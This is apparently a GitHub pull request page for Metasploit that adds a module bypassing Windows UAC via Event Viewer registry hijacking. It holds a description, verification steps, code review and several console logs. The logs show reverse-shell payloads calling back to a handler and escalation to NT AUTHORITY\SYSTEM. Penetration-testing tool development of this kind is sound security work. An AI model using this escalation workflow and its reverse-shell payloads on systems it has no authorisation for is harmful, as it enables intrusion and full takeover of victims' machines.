Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add bypass UAC via Event Viewer module #7532

Merged
merged 6 commits into from
Dec 1, 2016
Merged

Add bypass UAC via Event Viewer module #7532

merged 6 commits into from
Dec 1, 2016

Conversation

OJ
Copy link
Contributor

@OJ OJ commented Nov 4, 2016
edited by wchen-r7
Loading

This PR provides a new module that implements more bypass UAC functionality, this time via the Event Viewer. The original research was done by @enigma0x3 and @mattifestation, and this module does everything that they did but in Ruby/MSF-land (full kudos for the work goes to them).

Details of the research can be found here: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

The module should work with any combination of shell arch vs target arch. That is, you can run 32-bit payloads from a 64-bit session and vice-versa. The module has been tested on a fully patched Windows 10 installation.

Notes

This module has been written to make use of the changes made in #7507. This is because a bunch of arch/platform refactors were done, and I didn't want to add more work that needed to be merged after. Hence, it's important that #7507 gets landed before this is looked at.

As a result, the Travis build for this module will fail. When the PR is landed, this should go nicely green. I'll mark this as delayed for now, but is still up for review.

Sample runs

msf exploit(bypassuac_eventvwr) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  3   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  x.x.x.x:5005 -> x.x.x.x:50015 (x.x.x.x)
  4   meterpreter x86/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  x.x.x.x:5000 -> x.x.x.x:50016 (x.x.x.x)

msf exploit(bypassuac_eventvwr) > sess 3
[*] Starting interaction with 3...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 3...
msf exploit(bypassuac_eventvwr) > sess 4
[*] Starting interaction with 4...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 4...
msf exploit(bypassuac_eventvwr) > set session 3
session => 3
msf exploit(bypassuac_eventvwr) > run

[*] [2016.11.05-04:40:03] Started reverse TCP handler on x.x.x.x:4444
[*] [2016.11.05-04:40:05] UAC is Enabled, checking level...
[+] [2016.11.05-04:40:05] Part of Administrators group! Continuing...
[+] [2016.11.05-04:40:05] UAC is set to Default
[+] [2016.11.05-04:40:05] BypassUAC can bypass this setting, continuing...
[*] [2016.11.05-04:40:06] Configuring payload and stager registry keys ...
[*] [2016.11.05-04:40:07] Executing payload: C:\Windows\SysWOW64\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] [2016.11.05-04:40:08] Sending stage (957487 bytes) to x.x.x.x
[*] Meterpreter session 5 opened (x.x.x.x:4444 -> x.x.x.x:58629) at 2016-11-05 04:40:10 +1000
[*] [2016.11.05-04:40:12] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-5A73R51\oj
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.255.131 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(bypassuac_eventvwr) > set session 4
session => 4
msf exploit(bypassuac_eventvwr) > set target 1
target => 1
msf exploit(bypassuac_eventvwr) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(bypassuac_eventvwr) > run

[*] [2016.11.05-04:40:47] Started reverse TCP handler on x.x.x.x:4444
[*] [2016.11.05-04:40:50] UAC is Enabled, checking level...
[+] [2016.11.05-04:40:50] Part of Administrators group! Continuing...
[+] [2016.11.05-04:40:50] UAC is set to Default
[+] [2016.11.05-04:40:50] BypassUAC can bypass this setting, continuing...
[*] [2016.11.05-04:40:51] Configuring payload and stager registry keys ...
[*] [2016.11.05-04:40:51] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] [2016.11.05-04:40:53] Sending stage (1189423 bytes) to x.x.x.x
[*] Meterpreter session 6 opened (x.x.x.x:4444 -> x.x.x.x:58645) at 2016-11-05 04:40:54 +1000
[*] [2016.11.05-04:40:57] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-5A73R51\oj
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.255.131 - Meterpreter session 6 closed.  Reason: User exit

Verification

  • Create both x86 and x64 Windows meterp payloads.
  • Create boh x86 and x64 handlers.
  • Launch the payloads as an admin user (but not elevated) on your OS of choice (7/2008 through 10/2012).
  • Validate the getsystem doesn't work on either session.
  • Configure the module to use a 32-bit payload.
  • Run the module on both low-priv sessions.
  • Confirm that new sessions are created and that getsystem executes successfully on both.
  • Configure the module to use a 64-bit payload.
  • Run the module on both low-priv sessions.
  • Confirm that new sessions are created and that getsystem executes successfully on both.
  • Confirm that when eventvwr is run after the payload is fired that the actual Event Viewer application opens and runs correctly.

@OJ
Add module to bypassuac using eventvwr
4bf966f 
This module was inspired by the work done by Matt Nelson and Matt
Graeber who came up with the method in the first place. This works
nicely on a fully patched Windows 10 at the time of writing.
@OJ OJ added module blocked Blocked by one or more additional tasks labels Nov 4, 2016
@h00die
Copy link
Contributor

h00die commented Nov 13, 2016

This looks to be https://www.exploit-db.com/exploits/40268/ correct? Just tracking down any edb code that never got PRed

@OJ
Copy link
Contributor Author

OJ commented Nov 13, 2016
edited
Loading

@h00die no, I wrote my own from scratch. You'll notice that the module is out of date (uses Metasploit3), and takes a different approach in code. Seems to rely on it's own web delivery of some kind, which doesn't makes sense.

@bcook-r7
Copy link
Contributor

Hi @OJ can you please rebase this on master now that #7507 is landed :)

@OJ
Copy link
Contributor Author

OJ commented Nov 21, 2016

With pleasure!

@OJ OJ removed the blocked Blocked by one or more additional tasks label Nov 21, 2016
@wchen-r7 wchen-r7 self-assigned this Nov 28, 2016
wchen-r7
wchen-r7 reviewed Nov 30, 2016
View reviewed changes
modules/exploits/windows/local/bypassuac_eventvwr.rb

# Validate that we can actually do things before we bother
# doing any more work
validate_environment!
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hi @OJ, I believe you're missing the method for validate_environment!. Could you please add it? Thanks.

@OJ
Copy link
Contributor Author

OJ commented Nov 30, 2016 via email

@wchen-r7
Copy link
Contributor

Ah ok, thanks!

@OJ
Copy link
Contributor Author

OJ commented Nov 30, 2016 

msf exploit(bypassuac_eventvwr) > run

[*] [2016.12.01-08:01:22] Started HTTPS reverse handler on https://10.1.10.40:8888
[*] [2016.12.01-08:01:23] UAC is Enabled, checking level...
[+] [2016.12.01-08:01:23] Part of Administrators group! Continuing...
[+] [2016.12.01-08:01:23] UAC is set to Default
[+] [2016.12.01-08:01:23] BypassUAC can bypass this setting, continuing...
[*] [2016.12.01-08:01:23] Configuring payload and stager registry keys ...
[*] [2016.12.01-08:01:23] Executing payload: C:\Windows\SysWOW64\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] [2016.12.01-08:01:25] https://10.1.10.40:8888 handling request from 10.1.10.56; (UUID: gx5dgqed) Staging Native payload...
[*] Meterpreter session 2 opened (10.1.10.40:8888 -> 10.1.10.56:53881) at 2016-12-01 08:01:25 +1000
[*] [2016.12.01-08:01:28] Cleaining up registry keys ...

meterpreter > sysinfo
Computer        : DESKTOP-TF4F7AM
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Should be good now!

@wchen-r7
Copy link
Contributor

Thanks, I'm on it now :-)

@OJ
Copy link
Contributor Author

OJ commented Nov 30, 2016

Thanks for chasing me up @wchen-r7 :)

@wchen-r7
Copy link
Contributor

wchen-r7 commented Dec 1, 2016
edited
Loading

Module works for me:

msf exploit(bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 172.16.23.1:5555 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] Sending stage (957999 bytes) to 172.16.23.185
[*] Meterpreter session 10 opened (172.16.23.1:5555 -> 172.16.23.185:49162) at 2016-12-01 11:12:36 -0600
[*] Cleaining up registry keys ...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

And code looks nice. I'll merge it now. Thanks!

@wchen-r7 wchen-r7 merged commit ebf5121 into rapid7:master Dec 1, 2016
wchen-r7 added a commit that referenced this pull request Dec 1, 2016
@wchen-r7
Land #7532, Add bypass UAC local exploit via Event Viewer module
174cd74
@wchen-r7
Copy link
Contributor

wchen-r7 commented Dec 1, 2016

Release Notes

This is a local exploit module that allows you to bypass UAC via the Event Viewer. It works against a variety of Windows versions, from Windows 7 to Windows 10.

@enigma0x3
Copy link

Awesome, thanks all!

@OJ
Copy link
Contributor Author

OJ commented Dec 1, 2016 via email

@OJ OJ deleted the add-bypassuac-eventvwr branch June 16, 2017 06:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@wchen-r7 wchen-r7 wchen-r7 left review comments

Assignees

@wchen-r7 wchen-r7

Labels
feature module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
5 participants
@OJ @h00die @bcook-r7 @wchen-r7 @enigma0x3